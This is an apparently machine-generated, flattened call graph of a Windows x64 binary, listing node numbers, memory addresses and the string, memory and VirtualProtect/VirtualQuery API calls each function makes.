7ff71eb14024 wcscpy wcscat 2535->2536 2537 7ff71eb1404f memset 2536->2537 2541 7ff71eb14131 2536->2541 2539 7ff71eb14070 2537->2539 2538 7ff71eb140d5 wcslen 2540 7ff71eb140eb 2538->2540 2547 7ff71eb1412c 2538->2547 2539->2538 2543 7ff71eb14100 _wcsnicmp 2540->2543 2841 7ff71eb12df0 2541->2841 2545 7ff71eb14116 wcslen 2543->2545 2543->2547 2544 7ff71eb14234 2544->2499 2545->2543 2545->2547 2546 7ff71eb143a3 wcscpy wcscat memset 2549 7ff71eb143e5 2546->2549 2547->2546 2548 7ff71eb1442a wcscpy wcscat memset 2550 7ff71eb14470 2548->2550 2549->2548 2551 7ff71eb144d5 wcscpy wcscat memset 2550->2551 2553 7ff71eb1451b 2551->2553 2552 7ff71eb1454b wcscpy wcscat 2554 7ff71eb16641 memcpy 2552->2554 2555 7ff71eb1457d 2552->2555 2553->2552 2554->2555 2556 7ff71eb12df0 11 API calls 2555->2556 2557 7ff71eb1472c 2556->2557 2558 7ff71eb12df0 11 API calls 2557->2558 2559 7ff71eb14840 memset 2558->2559 2560 7ff71eb14861 2559->2560 2561 7ff71eb148a4 wcscpy wcscat memset 2560->2561 2563 7ff71eb148ed 2561->2563 2562 7ff71eb14930 wcscpy wcscat wcslen 2853 7ff71eb1146d 2562->2853 2563->2562 2566 7ff71eb14a44 2569 7ff71eb14b3a wcslen 2566->2569 2576 7ff71eb14d2d 2566->2576 2985 7ff71eb1157b 2569->2985 2570 7ff71eb1145e 2 API calls 2570->2566 2573 7ff71eb14d0c memset 2573->2576 2575 7ff71eb14c9f wcslen 3017 7ff71eb115e4 2575->3017 2577 7ff71eb14d9d wcscpy wcscat 2576->2577 2581 7ff71eb14dcf 2577->2581 2579 7ff71eb14bf9 2579->2573 2579->2575 2583 7ff71eb12df0 11 API calls 2581->2583 2582 7ff71eb1145e 2 API calls 2582->2573 2585 7ff71eb14ed7 2583->2585 2584 7ff71eb12df0 11 API calls 2586 7ff71eb14fec 2584->2586 2585->2584 2587 7ff71eb12df0 11 API calls 2586->2587 2588 7ff71eb150d6 2587->2588 2589 7ff71eb12df0 11 API calls 2588->2589 2591 7ff71eb151c3 2589->2591 2590 7ff71eb15304 wcslen 2592 7ff71eb1157b 2 API calls 2590->2592 2591->2590 2593 7ff71eb1538e 2592->2593 2594 7ff71eb15396 memset 2593->2594 2598 7ff71eb154a8 2593->2598 2595 7ff71eb153b7 2594->2595 2596 7ff71eb15407 wcslen 2595->2596 3020 7ff71eb115a8 2596->3020 2597 7ff71eb12df0 11 API calls 2605 7ff71eb15553 2597->2605 2598->2597 2606 7ff71eb15645 _wcsicmp 2598->2606 2601 7ff71eb15477 _wcsnicmp 2602 7ff71eb1549c 2601->2602 2610 7ff71eb15c91 2601->2610 2603 7ff71eb1145e 2 API calls 2602->2603 2603->2598 2604 7ff71eb12df0 11 API calls 2604->2606 2605->2604 2608 7ff71eb15660 memset 2606->2608 2624 7ff71eb159e3 2606->2624 2607 7ff71eb15cee wcslen 2609 7ff71eb115a8 2 API calls 2607->2609 2613 7ff71eb15684 2608->2613 2611 7ff71eb15d4a 2609->2611 2610->2607 2614 7ff71eb1145e 2 API calls 2611->2614 2612 7ff71eb156c9 wcscpy wcscat wcslen 2617 7ff71eb1146d 2 API calls 2612->2617 2613->2612 2614->2598 2615 7ff71eb15ab0 wcslen 2616 7ff71eb1153f 2 API calls 2615->2616 2618 7ff71eb15b3b 2616->2618 2619 7ff71eb15796 2617->2619 2620 7ff71eb1145e 2 API calls 2618->2620 3031 7ff71eb11530 2619->3031 2623 7ff71eb15b4c 2620->2623 2636 7ff71eb15bd8 2623->2636 3237 7ff71eb12f70 2623->3237 2624->2615 2625 7ff71eb16e0d 2627 7ff71eb1145e 2 API calls 2625->2627 2626 7ff71eb157d4 3058 7ff71eb114a9 2626->3058 2630 7ff71eb16e19 2627->2630 2629 7ff71eb15c35 wcslen 2633 7ff71eb15c4b 2629->2633 2655 7ff71eb15c8c 2629->2655 2630->2499 2637 7ff71eb15c60 _wcsnicmp 2633->2637 2634 7ff71eb15870 2640 7ff71eb1145e 2 API calls 2634->2640 2635 7ff71eb15b75 3241 7ff71eb138e0 2635->3241 2636->2629 2641 7ff71eb15c76 wcslen 2637->2641 2637->2655 2644 7ff71eb15864 2640->2644 2641->2637 2641->2655 3174 7ff71eb13350 memset 2644->3174 2645 7ff71eb15df9 memset wcscpy wcscat 2648 7ff71eb12f70 2 API calls 2645->2648 2646 7ff71eb15858 2649 7ff71eb1145e 2 API calls 2646->2649 2647 7ff71eb114c7 2 API calls 2650 7ff71eb15bca 2647->2650 2652 7ff71eb15e50 2648->2652 2649->2644 2650->2636 2657 7ff71eb1145e 2 API calls 2650->2657 2656 7ff71eb13350 11 API calls 2652->2656 2655->2645 2658 7ff71eb15e68 2656->2658 2657->2636 2659 7ff71eb114c7 2 API calls 2658->2659 2660 7ff71eb15e96 memset 2659->2660 2663 7ff71eb15eb7 2660->2663 2661 7ff71eb12df0 11 API calls 2670 7ff71eb15948 2661->2670 2662 7ff71eb158bf 2662->2661 2664 7ff71eb15f07 wcslen 2663->2664 2665 7ff71eb15f57 wcscat memset 2664->2665 2666 7ff71eb15f19 2664->2666 2672 7ff71eb15f91 2665->2672 2667 7ff71eb15f30 _wcsnicmp 2666->2667 2667->2665 2669 7ff71eb15f42 wcslen 2667->2669 2669->2665 2669->2667 2671 7ff71eb12df0 11 API calls 2670->2671 2671->2544 2673 7ff71eb15ff4 wcscpy wcscat 2672->2673 2674 7ff71eb16029 2673->2674 2675 7ff71eb16d81 memcpy 2674->2675 2677 7ff71eb16151 2674->2677 2675->2677 2676 7ff71eb1620f wcslen 2678 7ff71eb1153f 2 API calls 2676->2678 2677->2676 2679 7ff71eb1629a 2678->2679 2680 7ff71eb1145e 2 API calls 2679->2680 2681 7ff71eb162ab 2680->2681 2682 7ff71eb16343 2681->2682 2684 7ff71eb12f70 2 API calls 2681->2684 2683 7ff71eb1145e 2 API calls 2682->2683 2683->2544 2685 7ff71eb162d8 2684->2685 2686 7ff71eb138e0 11 API calls 2685->2686 2687 7ff71eb162fd 2686->2687 2688 7ff71eb114c7 2 API calls 2687->2688 2689 7ff71eb16335 2688->2689 2689->2682 2690 7ff71eb1145e 2 API calls 2689->2690 2690->2682 2694 7ff71eb11bc2 2691->2694 2692 7ff71eb11c04 memcpy 2692->2508 2694->2692 2695 7ff71eb11c45 VirtualQuery 2694->2695 2696 7ff71eb11cf4 2694->2696 2695->2696 2700 7ff71eb11c72 2695->2700 2697 7ff71eb11d23 GetLastError 2696->2697 2698 7ff71eb11d37 2697->2698 2699 7ff71eb11ca4 VirtualProtect 2699->2692 2699->2697 2700->2692 2700->2699 3264 7ff71eb11394 2701->3264 2703 7ff71eb1154e 2704 7ff71eb11394 2 API calls 2703->2704 2705 7ff71eb1155d 2704->2705 2706 7ff71eb11394 2 API calls 2705->2706 2707 7ff71eb1156c 2706->2707 2708 7ff71eb11394 2 API calls 2707->2708 2709 7ff71eb1157b 2708->2709 2710 7ff71eb11394 2 API calls 2709->2710 2711 7ff71eb1158a 2710->2711 2712 7ff71eb11394 2 API calls 2711->2712 2713 7ff71eb11599 2712->2713 2714 7ff71eb11394 2 API calls 2713->2714 2715 7ff71eb115a8 2714->2715 2716 7ff71eb11394 2 API calls 2715->2716 2717 7ff71eb115b7 2716->2717 2718 7ff71eb11394 2 API calls 2717->2718 2719 7ff71eb115c6 2718->2719 2720 7ff71eb11394 2 API calls 2719->2720 2721 7ff71eb115d5 2720->2721 2722 7ff71eb115e4 2721->2722 2723 7ff71eb11394 2 API calls 2721->2723 2724 7ff71eb11394 2 API calls 2722->2724 2723->2722 2725 7ff71eb115f3 2724->2725 2725->2544 2726 7ff71eb11503 2725->2726 2727 7ff71eb11394 2 API calls 2726->2727 2728 7ff71eb1150d 2727->2728 2729 7ff71eb11394 2 API calls 2728->2729 2730 7ff71eb11512 2729->2730 2731 7ff71eb11394 2 API calls 2730->2731 2732 7ff71eb11521 2731->2732 2733 7ff71eb11394 2 API calls 2732->2733 2734 7ff71eb11530 2733->2734 2735 7ff71eb11394 2 API calls 2734->2735 2736 7ff71eb1153f 2735->2736 2737 7ff71eb11394 2 API calls 2736->2737 2738 7ff71eb1154e 2737->2738 2739 7ff71eb11394 2 API calls 2738->2739 2740 7ff71eb1155d 2739->2740 2741 7ff71eb11394 2 API calls 2740->2741 2742 7ff71eb1156c 2741->2742 2743 7ff71eb11394 2 API calls 2742->2743 2744 7ff71eb1157b 2743->2744 2745 7ff71eb11394 2 API calls 2744->2745 2746 7ff71eb1158a 2745->2746 2747 7ff71eb11394 2 API calls 2746->2747 2748 7ff71eb11599 2747->2748 2749 7ff71eb11394 2 API calls 2748->2749 2750 7ff71eb115a8 2749->2750 2751 7ff71eb11394 2 API calls 2750->2751 2752 7ff71eb115b7 2751->2752 2753 7ff71eb11394 2 API calls 2752->2753 2754 7ff71eb115c6 2753->2754 2755 7ff71eb11394 2 API calls 2754->2755 2756 7ff71eb115d5 2755->2756 2757 7ff71eb115e4 2756->2757 2758 7ff71eb11394 2 API calls 2756->2758 2759 7ff71eb11394 2 API calls 2757->2759 2758->2757 2760 7ff71eb115f3 2759->2760 2760->2523 2761 7ff71eb1156c 2760->2761 2762 7ff71eb11394 2 API calls 2761->2762 2763 7ff71eb1157b 2762->2763 2764 7ff71eb11394 2 API calls 2763->2764 2765 7ff71eb1158a 2764->2765 2766 7ff71eb11394 2 API calls 2765->2766 2767 7ff71eb11599 2766->2767 2768 7ff71eb11394 2 API calls 2767->2768 2769 7ff71eb115a8 2768->2769 2770 7ff71eb11394 2 API calls 2769->2770 2771 7ff71eb115b7 2770->2771 2772 7ff71eb11394 2 API calls 2771->2772 2773 7ff71eb115c6 2772->2773 2774 7ff71eb11394 2 API calls 2773->2774 2775 7ff71eb115d5 2774->2775 2776 7ff71eb115e4 2775->2776 2777 7ff71eb11394 2 API calls 2775->2777 2778 7ff71eb11394 2 API calls 2776->2778 2777->2776 2779 7ff71eb115f3 2778->2779 2779->2523 2780 7ff71eb1145e 2779->2780 2781 7ff71eb11394 2 API calls 2780->2781 2782 7ff71eb1146d 2781->2782 2783 7ff71eb11394 2 API calls 2782->2783 2784 7ff71eb1147c 2783->2784 2785 7ff71eb11394 2 API calls 2784->2785 2786 7ff71eb1148b 2785->2786 2787 7ff71eb11394 2 API calls 2786->2787 2788 7ff71eb1149a 2787->2788 2789 7ff71eb11394 2 API calls 2788->2789 2790 7ff71eb114a9 2789->2790 2791 7ff71eb11394 2 API calls 2790->2791 2792 7ff71eb114b8 2791->2792 2793 7ff71eb11394 2 API calls 2792->2793 2794 7ff71eb114c7 2793->2794 2795 7ff71eb11394 2 API calls 2794->2795 2796 7ff71eb114d6 2795->2796 2797 7ff71eb114e5 2796->2797 2798 7ff71eb11394 2 API calls 2796->2798 2799 7ff71eb11394 2 API calls 2797->2799 2798->2797 2800 7ff71eb114ef 2799->2800 2801 7ff71eb114f4 2800->2801 2802 7ff71eb11394 2 API calls 2800->2802 2803 7ff71eb11394 2 API calls 2801->2803 2802->2801 2804 7ff71eb114fe 2803->2804 2805 7ff71eb11503 2804->2805 2806 7ff71eb11394 2 API calls 2804->2806 2807 7ff71eb11394 2 API calls 2805->2807 2806->2805 2808 7ff71eb1150d 2807->2808 2809 7ff71eb11394 2 API calls 2808->2809 2810 7ff71eb11512 2809->2810 2811 7ff71eb11394 2 API calls 2810->2811 2812 7ff71eb11521 2811->2812 2813 7ff71eb11394 2 API calls 2812->2813 2814 7ff71eb11530 2813->2814 2815 7ff71eb11394 2 API calls 2814->2815 2816 7ff71eb1153f 2815->2816 2817 7ff71eb11394 2 API calls 2816->2817 2818 7ff71eb1154e 2817->2818 2819 7ff71eb11394 2 API calls 2818->2819 2820 7ff71eb1155d 2819->2820 2821 7ff71eb11394 2 API calls 2820->2821 2822 7ff71eb1156c 2821->2822 2823 7ff71eb11394 2 API calls 2822->2823 2824 7ff71eb1157b 2823->2824 2825 7ff71eb11394 2 API calls 2824->2825 2826 7ff71eb1158a 2825->2826 2827 7ff71eb11394 2 API calls 2826->2827 2828 7ff71eb11599 2827->2828 2829 7ff71eb11394 2 API calls 2828->2829 2830 7ff71eb115a8 2829->2830 2831 7ff71eb11394 2 API calls 2830->2831 2832 7ff71eb115b7 2831->2832 2833 7ff71eb11394 2 API calls 2832->2833 2834 7ff71eb115c6 2833->2834 2835 7ff71eb11394 2 API calls 2834->2835 2836 7ff71eb115d5 2835->2836 2837 7ff71eb115e4 2836->2837 2838 7ff71eb11394 2 API calls 2836->2838 2839 7ff71eb11394 2 API calls 2837->2839 2838->2837 2840 7ff71eb115f3 2839->2840 2840->2523 3274 7ff71eb12660 2841->3274 2846 7ff71eb1145e 2 API calls 2847 7ff71eb12f35 2846->2847 2848 7ff71eb12f53 2847->2848 3309 7ff71eb11512 2847->3309 2851 7ff71eb1145e 2 API calls 2848->2851 2849 7ff71eb12e3c 3276 7ff71eb12690 2849->3276 2852 7ff71eb12f5d 2851->2852 2852->2544 2854 7ff71eb11394 2 API calls 2853->2854 2855 7ff71eb1147c 2854->2855 2856 7ff71eb11394 2 API calls 2855->2856 2857 7ff71eb1148b 2856->2857 2858 7ff71eb11394 2 API calls 2857->2858 2859 7ff71eb1149a 2858->2859 2860 7ff71eb11394 2 API calls 2859->2860 2861 7ff71eb114a9 2860->2861 2862 7ff71eb11394 2 API calls 2861->2862 2863 7ff71eb114b8 2862->2863 2864 7ff71eb11394 2 API calls 2863->2864 2865 7ff71eb114c7 2864->2865 2866 7ff71eb11394 2 API calls 2865->2866 2867 7ff71eb114d6 2866->2867 2868 7ff71eb114e5 2867->2868 2869 7ff71eb11394 2 API calls 2867->2869 2870 7ff71eb11394 2 API calls 2868->2870 2869->2868 2871 7ff71eb114ef 2870->2871 2872 7ff71eb114f4 2871->2872 2873 7ff71eb11394 2 API calls 2871->2873 2874 7ff71eb11394 2 API calls 2872->2874 2873->2872 2875 7ff71eb114fe 2874->2875 2876 7ff71eb11503 2875->2876 2877 7ff71eb11394 2 API calls 2875->2877 2878 7ff71eb11394 2 API calls 2876->2878 2877->2876 2879 7ff71eb1150d 2878->2879 2880 7ff71eb11394 2 API calls 2879->2880 2881 7ff71eb11512 2880->2881 2882 7ff71eb11394 2 API calls 2881->2882 2883 7ff71eb11521 2882->2883 2884 7ff71eb11394 2 API calls 2883->2884 2885 7ff71eb11530 2884->2885 2886 7ff71eb11394 2 API calls 2885->2886 2887 7ff71eb1153f 2886->2887 2888 7ff71eb11394 2 API calls 2887->2888 2889 7ff71eb1154e 2888->2889 2890 7ff71eb11394 2 API calls 2889->2890 2891 7ff71eb1155d 2890->2891 2892 7ff71eb11394 2 API calls 2891->2892 2893 7ff71eb1156c 2892->2893 2894 7ff71eb11394 2 API calls 2893->2894 2895 7ff71eb1157b 2894->2895 2896 7ff71eb11394 2 API calls 2895->2896 2897 7ff71eb1158a 2896->2897 2898 7ff71eb11394 2 API calls 2897->2898 2899 7ff71eb11599 2898->2899 2900 7ff71eb11394 2 API calls 2899->2900 2901 7ff71eb115a8 2900->2901 2902 7ff71eb11394 2 API calls 2901->2902 2903 7ff71eb115b7 2902->2903 2904 7ff71eb11394 2 API calls 2903->2904 2905 7ff71eb115c6 2904->2905 2906 7ff71eb11394 2 API calls 2905->2906 2907 7ff71eb115d5 2906->2907 2908 7ff71eb115e4 2907->2908 2909 7ff71eb11394 2 API calls 2907->2909 2910 7ff71eb11394 2 API calls 2908->2910 2909->2908 2911 7ff71eb115f3 2910->2911 2911->2566 2912 7ff71eb11404 2911->2912 2913 7ff71eb11394 2 API calls 2912->2913 2914 7ff71eb11413 2913->2914 2915 7ff71eb11394 2 API calls 2914->2915 2916 7ff71eb11422 2915->2916 2917 7ff71eb11394 2 API calls 2916->2917 2918 7ff71eb11431 2917->2918 2919 7ff71eb11394 2 API calls 2918->2919 2920 7ff71eb11440 2919->2920 2921 7ff71eb11394 2 API calls 2920->2921 2922 7ff71eb1144f 2921->2922 2923 7ff71eb11394 2 API calls 2922->2923 2924 7ff71eb1145e 2923->2924 2925 7ff71eb11394 2 API calls 2924->2925 2926 7ff71eb1146d 2925->2926 2927 7ff71eb11394 2 API calls 2926->2927 2928 7ff71eb1147c 2927->2928 2929 7ff71eb11394 2 API calls 2928->2929 2930 7ff71eb1148b 2929->2930 2931 7ff71eb11394 2 API calls 2930->2931 2932 7ff71eb1149a 2931->2932 2933 7ff71eb11394 2 API calls 2932->2933 2934 7ff71eb114a9 2933->2934 2935 7ff71eb11394 2 API calls 2934->2935 2936 7ff71eb114b8 2935->2936 2937 7ff71eb11394 2 API calls 2936->2937 2938 7ff71eb114c7 2937->2938 2939 7ff71eb11394 2 API calls 2938->2939 2940 7ff71eb114d6 2939->2940 2941 7ff71eb114e5 2940->2941 2942 7ff71eb11394 2 API calls 2940->2942 2943 7ff71eb11394 2 API calls 2941->2943 2942->2941 2944 7ff71eb114ef 2943->2944 2945 7ff71eb114f4 2944->2945 2946 7ff71eb11394 2 API calls 2944->2946 2947 7ff71eb11394 2 API calls 2945->2947 2946->2945 2948 7ff71eb114fe 2947->2948 2949 7ff71eb11503 2948->2949 2950 7ff71eb11394 2 API calls 2948->2950 2951 7ff71eb11394 2 API calls 2949->2951 2950->2949 2952 7ff71eb1150d 2951->2952 2953 7ff71eb11394 2 API calls 2952->2953 2954 7ff71eb11512 2953->2954 2955 7ff71eb11394 2 API calls 2954->2955 2956 7ff71eb11521 2955->2956 2957 7ff71eb11394 2 API calls 2956->2957 2958 7ff71eb11530 2957->2958 2959 7ff71eb11394 2 API calls 2958->2959 2960 7ff71eb1153f 2959->2960 2961 7ff71eb11394 2 API calls 2960->2961 2962 7ff71eb1154e 2961->2962 2963 7ff71eb11394 2 API calls 2962->2963 2964 7ff71eb1155d 2963->2964 2965 7ff71eb11394 2 API calls 2964->2965 2966 7ff71eb1156c 2965->2966 2967 7ff71eb11394 2 API calls 2966->2967 2968 7ff71eb1157b 2967->2968 2969 7ff71eb11394 2 API calls 2968->2969 2970 7ff71eb1158a 2969->2970 2971 7ff71eb11394 2 API calls 2970->2971 2972 7ff71eb11599 2971->2972 2973 7ff71eb11394 2 API calls 2972->2973 2974 7ff71eb115a8 2973->2974 2975 7ff71eb11394 2 API calls 2974->2975 2976 7ff71eb115b7 2975->2976 2977 7ff71eb11394 2 API calls 2976->2977 2978 7ff71eb115c6 2977->2978 2979 7ff71eb11394 2 API calls 2978->2979 2980 7ff71eb115d5 2979->2980 2981 7ff71eb115e4 2980->2981 2982 7ff71eb11394 2 API calls 2980->2982 2983 7ff71eb11394 2 API calls 2981->2983 2982->2981 2984 7ff71eb115f3 2983->2984 2984->2570 2986 7ff71eb11394 2 API calls 2985->2986 2987 7ff71eb1158a 2986->2987 2988 7ff71eb11394 2 API calls 2987->2988 2989 7ff71eb11599 2988->2989 2990 7ff71eb11394 2 API calls 2989->2990 2991 7ff71eb115a8 2990->2991 2992 7ff71eb11394 2 API calls 2991->2992 2993 7ff71eb115b7 2992->2993 2994 7ff71eb11394 2 API calls 2993->2994 2995 7ff71eb115c6 2994->2995 2996 7ff71eb11394 2 API calls 2995->2996 2997 7ff71eb115d5 2996->2997 2998 7ff71eb115e4 2997->2998 2999 7ff71eb11394 2 API calls 2997->2999 3000 7ff71eb11394 2 API calls 2998->3000 2999->2998 3001 7ff71eb115f3 3000->3001 3001->2579 3002 7ff71eb1158a 3001->3002 3003 7ff71eb11394 2 API calls 3002->3003 3004 7ff71eb11599 3003->3004 3005 7ff71eb11394 2 API calls 3004->3005 3006 7ff71eb115a8 3005->3006 3007 7ff71eb11394 2 API calls 3006->3007 3008 7ff71eb115b7 3007->3008 3009 7ff71eb11394 2 API calls 3008->3009 3010 7ff71eb115c6 3009->3010 3011 7ff71eb11394 2 API calls 3010->3011 3012 7ff71eb115d5 3011->3012 3013 7ff71eb115e4 3012->3013 3014 7ff71eb11394 2 API calls 3012->3014 3015 7ff71eb11394 2 API calls 3013->3015 3014->3013 3016 7ff71eb115f3 3015->3016 3016->2579 3018 7ff71eb11394 2 API calls 3017->3018 3019 7ff71eb115f3 3018->3019 3019->2582 3021 7ff71eb11394 2 API calls 3020->3021 3022 7ff71eb115b7 3021->3022 3023 7ff71eb11394 2 API calls 3022->3023 3024 7ff71eb115c6 3023->3024 3025 7ff71eb11394 2 API calls 3024->3025 3026 7ff71eb115d5 3025->3026 3027 7ff71eb115e4 3026->3027 3028 7ff71eb11394 2 API calls 3026->3028 3029 7ff71eb11394 2 API calls 3027->3029 3028->3027 3030 7ff71eb115f3 3029->3030 3030->2601 3030->2602 3032 7ff71eb11394 2 API calls 3031->3032 3033 7ff71eb1153f 3032->3033 3034 7ff71eb11394 2 API calls 3033->3034 3035 7ff71eb1154e 3034->3035 3036 7ff71eb11394 2 API calls 3035->3036 3037 7ff71eb1155d 3036->3037 3038 7ff71eb11394 2 API calls 3037->3038 3039 7ff71eb1156c 3038->3039 3040 7ff71eb11394 2 API calls 3039->3040 3041 7ff71eb1157b 3040->3041 3042 7ff71eb11394 2 API calls 3041->3042 3043 7ff71eb1158a 3042->3043 3044 7ff71eb11394 2 API calls 3043->3044 3045 7ff71eb11599 3044->3045 3046 7ff71eb11394 2 API calls 3045->3046 3047 7ff71eb115a8 3046->3047 3048 7ff71eb11394 2 API calls 3047->3048 3049 7ff71eb115b7 3048->3049 3050 7ff71eb11394 2 API calls 3049->3050 3051 7ff71eb115c6 3050->3051 3052 7ff71eb11394 2 API calls 3051->3052 3053 7ff71eb115d5 3052->3053 3054 7ff71eb115e4 3053->3054 3055 7ff71eb11394 2 API calls 3053->3055 3056 7ff71eb11394 2 API calls 3054->3056 3055->3054 3057 7ff71eb115f3 3056->3057 3057->2625 3057->2626 3059 7ff71eb11394 2 API calls 3058->3059 3060 7ff71eb114b8 3059->3060 3061 7ff71eb11394 2 API calls 3060->3061 3062 7ff71eb114c7 3061->3062 3063 7ff71eb11394 2 API calls 3062->3063 3064 7ff71eb114d6 3063->3064 3065 7ff71eb114e5 3064->3065 3066 7ff71eb11394 2 API calls 3064->3066 3067 7ff71eb11394 2 API calls 3065->3067 3066->3065 3068 7ff71eb114ef 3067->3068 3069 7ff71eb114f4 3068->3069 3070 7ff71eb11394 2 API calls 3068->3070 3071 7ff71eb11394 2 API calls 3069->3071 3070->3069 3072 7ff71eb114fe 3071->3072 3073 7ff71eb11503 3072->3073 3074 7ff71eb11394 2 API calls 3072->3074 3075 7ff71eb11394 2 API calls 3073->3075 3074->3073 3076 7ff71eb1150d 3075->3076 3077 7ff71eb11394 2 API calls 3076->3077 3078 7ff71eb11512 3077->3078 3079 7ff71eb11394 2 API calls 3078->3079 3080 7ff71eb11521 3079->3080 3081 7ff71eb11394 2 API calls 3080->3081 3082 7ff71eb11530 3081->3082 3083 7ff71eb11394 2 API calls 3082->3083 3084 7ff71eb1153f 3083->3084 3085 7ff71eb11394 2 API calls 3084->3085 3086 7ff71eb1154e 3085->3086 3087 7ff71eb11394 2 API calls 3086->3087 3088 7ff71eb1155d 3087->3088 3089 7ff71eb11394 2 API calls 3088->3089 3090 7ff71eb1156c 3089->3090 3091 7ff71eb11394 2 API calls 3090->3091 3092 7ff71eb1157b 3091->3092 3093 7ff71eb11394 2 API calls 3092->3093 3094 7ff71eb1158a 3093->3094 3095 7ff71eb11394 2 API calls 3094->3095 3096 7ff71eb11599 3095->3096 3097 7ff71eb11394 2 API calls 3096->3097 3098 7ff71eb115a8 3097->3098 3099 7ff71eb11394 2 API calls 3098->3099 3100 7ff71eb115b7 3099->3100 3101 7ff71eb11394 2 API calls 3100->3101 3102 7ff71eb115c6 3101->3102 3103 7ff71eb11394 2 API calls 3102->3103 3104 7ff71eb115d5 3103->3104 3105 7ff71eb115e4 3104->3105 3106 7ff71eb11394 2 API calls 3104->3106 3107 7ff71eb11394 2 API calls 3105->3107 3106->3105 3108 7ff71eb115f3 3107->3108 3108->2634 3109 7ff71eb11440 3108->3109 3110 7ff71eb11394 2 API calls 3109->3110 3111 7ff71eb1144f 3110->3111 3112 7ff71eb11394 2 API calls 3111->3112 3113 7ff71eb1145e 3112->3113 3114 7ff71eb11394 2 API calls 3113->3114 3115 7ff71eb1146d 3114->3115 3116 7ff71eb11394 2 API calls 3115->3116 3117 7ff71eb1147c 3116->3117 3118 7ff71eb11394 2 API calls 3117->3118 3119 7ff71eb1148b 3118->3119 3120 7ff71eb11394 2 API calls 3119->3120 3121 7ff71eb1149a 3120->3121 3122 7ff71eb11394 2 API calls 3121->3122 3123 7ff71eb114a9 3122->3123 3124 7ff71eb11394 2 API calls 3123->3124 3125 7ff71eb114b8 3124->3125 3126 7ff71eb11394 2 API calls 3125->3126 3127 7ff71eb114c7 3126->3127 3128 7ff71eb11394 2 API calls 3127->3128 3129 7ff71eb114d6 3128->3129 3130 7ff71eb114e5 3129->3130 3131 7ff71eb11394 2 API calls 3129->3131 3132 7ff71eb11394 2 API calls 3130->3132 3131->3130 3133 7ff71eb114ef 3132->3133 3134 7ff71eb114f4 3133->3134 3135 7ff71eb11394 2 API calls 3133->3135 3136 7ff71eb11394 2 API calls 3134->3136 3135->3134 3137 7ff71eb114fe 3136->3137 3138 7ff71eb11503 3137->3138 3139 7ff71eb11394 2 API calls 3137->3139 3140 7ff71eb11394 2 API calls 3138->3140 3139->3138 3141 7ff71eb1150d 3140->3141 3142 7ff71eb11394 2 API calls 3141->3142 3143 7ff71eb11512 3142->3143 3144 7ff71eb11394 2 API calls 3143->3144 3145 7ff71eb11521 3144->3145 3146 7ff71eb11394 2 API calls 3145->3146 3147 7ff71eb11530 3146->3147 3148 7ff71eb11394 2 API calls 3147->3148 3149 7ff71eb1153f 3148->3149 3150 7ff71eb11394 2 API calls 3149->3150 3151 7ff71eb1154e 3150->3151 3152 7ff71eb11394 2 API calls 3151->3152 3153 7ff71eb1155d 3152->3153 3154 7ff71eb11394 2 API calls 3153->3154 3155 7ff71eb1156c 3154->3155 3156 7ff71eb11394 2 API calls 3155->3156 3157 7ff71eb1157b 3156->3157 3158 7ff71eb11394 2 API calls 3157->3158 3159 7ff71eb1158a 3158->3159 3160 7ff71eb11394 2 API calls 3159->3160 3161 7ff71eb11599 3160->3161 3162 7ff71eb11394 2 API calls 3161->3162 3163 7ff71eb115a8 3162->3163 3164 7ff71eb11394 2 API calls 3163->3164 3165 7ff71eb115b7 3164->3165 3166 7ff71eb11394 2 API calls 3165->3166 3167 7ff71eb115c6 3166->3167 3168 7ff71eb11394 2 API calls 3167->3168 3169 7ff71eb115d5 3168->3169 3170 7ff71eb115e4 3169->3170 3171 7ff71eb11394 2 API calls 3169->3171 3172 7ff71eb11394 2 API calls 3170->3172 3171->3170 3173 7ff71eb115f3 3172->3173 3173->2634 3173->2646 3175 7ff71eb135c1 memset 3174->3175 3179 7ff71eb133c3 3174->3179 3178 7ff71eb135e6 3175->3178 3176 7ff71eb1343a memset 3176->3179 3177 7ff71eb1362b wcscpy wcscat wcslen 3180 7ff71eb11422 2 API calls 3177->3180 3178->3177 3179->3175 3179->3176 3181 7ff71eb13493 wcscpy wcscat wcslen 3179->3181 3188 7ff71eb1145e 2 API calls 3179->3188 3189 7ff71eb13579 3179->3189 3183 7ff71eb13728 3180->3183 3443 7ff71eb11422 3181->3443 3182 7ff71eb13767 3190 7ff71eb114c7 3182->3190 3183->3182 3512 7ff71eb11431 3183->3512 3187 7ff71eb1145e 2 API calls 3187->3182 3188->3179 3189->3175 3191 7ff71eb11394 2 API calls 3190->3191 3192 7ff71eb114d6 3191->3192 3193 7ff71eb114e5 3192->3193 3194 7ff71eb11394 2 API calls 3192->3194 3195 7ff71eb11394 2 API calls 3193->3195 3194->3193 3196 7ff71eb114ef 3195->3196 3197 7ff71eb114f4 3196->3197 3198 7ff71eb11394 2 API calls 3196->3198 3199 7ff71eb11394 2 API calls 3197->3199 3198->3197 3200 7ff71eb114fe 3199->3200 3201 7ff71eb11503 3200->3201 3202 7ff71eb11394 2 API calls 3200->3202 3203 7ff71eb11394 2 API calls 3201->3203 3202->3201 3204 7ff71eb1150d 3203->3204 3205 7ff71eb11394 2 API calls 3204->3205 3206 7ff71eb11512 3205->3206 3207 7ff71eb11394 2 API calls 3206->3207 3208 7ff71eb11521 3207->3208 3209 7ff71eb11394 2 API calls 3208->3209 3210 7ff71eb11530 3209->3210 3211 7ff71eb11394 2 API calls 3210->3211 3212 7ff71eb1153f 3211->3212 3213 7ff71eb11394 2 API calls 3212->3213 3214 7ff71eb1154e 3213->3214 3215 7ff71eb11394 2 API calls 3214->3215 3216 7ff71eb1155d 3215->3216 3217 7ff71eb11394 2 API calls 3216->3217 3218 7ff71eb1156c 3217->3218 3219 7ff71eb11394 2 API calls 3218->3219 3220 7ff71eb1157b 3219->3220 3221 7ff71eb11394 2 API calls 3220->3221 3222 7ff71eb1158a 3221->3222 3223 7ff71eb11394 2 API calls 3222->3223 3224 7ff71eb11599 3223->3224 3225 7ff71eb11394 2 API calls 3224->3225 3226 7ff71eb115a8 3225->3226 3227 7ff71eb11394 2 API calls 3226->3227 3228 7ff71eb115b7 3227->3228 3229 7ff71eb11394 2 API calls 3228->3229 3230 7ff71eb115c6 3229->3230 3231 7ff71eb11394 2 API calls 3230->3231 3232 7ff71eb115d5 3231->3232 3233 7ff71eb115e4 3232->3233 3234 7ff71eb11394 2 API calls 3232->3234 3235 7ff71eb11394 2 API calls 3233->3235 3234->3233 3236 7ff71eb115f3 3235->3236 3236->2662 3238 7ff71eb12f88 3237->3238 3239 7ff71eb114a9 2 API calls 3238->3239 3240 7ff71eb12fd0 3239->3240 3240->2635 3242 7ff71eb12690 10 API calls 3241->3242 3243 